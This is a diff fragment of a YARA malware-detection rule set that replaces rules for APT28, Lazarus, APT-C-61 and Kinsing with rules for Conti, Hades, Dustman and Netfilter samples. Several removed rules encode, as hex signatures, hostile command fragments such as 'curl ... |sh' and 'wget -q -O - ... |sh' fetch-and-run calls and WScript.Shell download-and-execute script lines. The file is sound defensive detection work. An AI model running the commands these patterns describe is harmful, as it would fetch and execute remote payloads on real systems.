+		$seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 }
+		$seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff }
+		$seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 9 of them
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE
 {
 	meta:
-		description = "Detect Zekapab used by APT28 group"
+		description = "Detect unpacked Conti ransomware (May 2021)"
 		author = "Arkbird_SOLG"
-		id = "634f32dd-8bcf-5c58-a335-9b66ff568a54"
-		date = "2021-03-15"
-		modified = "2021-03-15"
-		reference = "https://twitter.com/DrunkBinary/status/1371423755608719360"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25"
+		id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e"
+		date = "2021-05-20"
+		modified = "2021-05-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6"
-		score = 60
-		quality = 23
+		logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15"
+		hash1 = "Redacted"
+		hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266"
+		hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3"
+		hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2"
 
 	strings:
-		$s1 = { 68 74 74 70 3A 2F 2F }
-		$s2 = { 68 74 74 70 73 3A 2F 2F }
-		$s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 }
-		$s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 }
-		$s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 }
-		$s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 }
-		$header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 }
-		$header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 }
-		$dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 }
-		$dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 }
-		$dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e }
-		$dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 }
-		$dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e }
-		$dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 }
+		$seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 }
+		$seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b }
+		$seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff }
+		$seq4 = { 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e }
+		$seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b }
+		$seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 1 of ( $header* ) and 3 of ( $s* ) and 4 of ( $dbg* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 5 of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE
 {
 	meta:
-		description = " Detected Lazarus EPS script for download and execute the payload in base 64"
+		description = "Detect the loader used by Hades ransomware for load the final implant in memory"
 		author = "Arkbird_SOLG"
-		id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403"
-		date = "2020-07-28"
-		modified = "2020-07-28"
-		reference = "https://twitter.com/spider_girl22/status/1287952503280082944"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30"
+		id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c"
+		date = "2020-12-27"
+		modified = "2021-01-01"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24"
 		license_url = "N/A"
-		logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552"
-		score = 75
-		quality = 45
+		logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd"
+		score = 50
+		quality = 71
 		tags = "FILE"
-		hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7"
+		hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00"
+		hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d"
+		level = "Experimental"
 
 	strings:
-		$s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 }
-		$s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 }
-		$s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 }
-		$s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 }
-		$s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 }
-		$s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 }
-		$s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 }
-		$s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 }
-		$s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 }
-		$s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 }
-		$s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E }
-		$s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 }
-		$s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 }
-		$s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 }
-		$s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 }
-		$URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? }
-		$URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? }
+		$seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 }
+		$seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 }
+		$seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 }
+		$s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide
+		$s2 = "_VERSION_INFO" fullword wide
+		$s3 = "VkKeyScanW" fullword ascii
+		$s4 = { 53 43 61 4d 69 72 }
 
 	condition:
-		uint16( 0 ) == 0x33c9 and filesize < 3KB and ( 1 of ( $URL* ) ) and ( 12 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 2 of ( $seq* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect similiar structures used in the APT-C-61 maldocs"
+		description = "Detect the Installer of Dustman wiper used by APT34"
 		author = "Arkbird_SOLG"
-		id = "48054d32-6613-5a54-b19c-8e9b8f747c14"
-		date = "2021-12-13"
-		modified = "2021-12-14"
+		id = "071063f5-d2a4-5666-a8c4-283c02061f6d"
+		date = "2021-04-28"
+		modified = "2021-04-30"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389"
+		logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff"
-		hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431"
-		hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2"
+		hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882"
 		tlp = "white"
-		adversary = "APT-C-61"
+		adversary = "APT34"
 
 	strings:
-		$s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
-		$s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 }
-		$s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
-		$s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e }
+		$s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 }
+		$s2 = "\\assistant.sys" fullword wide
+		$s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 }
+		$s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 }
+		$s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 }
+		$s6 = "Release\\Dustman.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize > 20KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and 4 of them
 }
-rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE
+rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect Kinsing Variant A"
+		description = "Detect Netfilter rootkit"
 		author = "Arkbird_SOLG"
-		id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0"
-		date = "2020-08-28"
-		modified = "2020-08-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30"
+		id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3"
+		date = "2021-06-18"
+		modified = "2021-06-21"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0"
+		logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1"
 		score = 75
-		quality = 67
+		quality = 73
 		tags = "FILE"
-		hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488"
-		hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318"
-		hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16"
-		hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c"
+		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
+		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
+		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
-		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
-		$ClassCode3 = "java/net/URL" fullword ascii
-		$ClassCode4 = "java/net/URLConnection" fullword ascii
-		$ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
-		$Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
-		$Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
-		$Com3 = "chmod +x " fullword ascii
-		$Com4 = { 53 4b 4c 01 00 02 6c 66 }
-		$s1 = "User-Agent" fullword ascii
-		$s2 = "kinsing" fullword ascii
-		$s3 = { 6f 73 2e 6e 61 6d 65 }
-		$s4 = "getAbsolutePath" fullword ascii
-		$s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e }
+		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
+		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
+		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
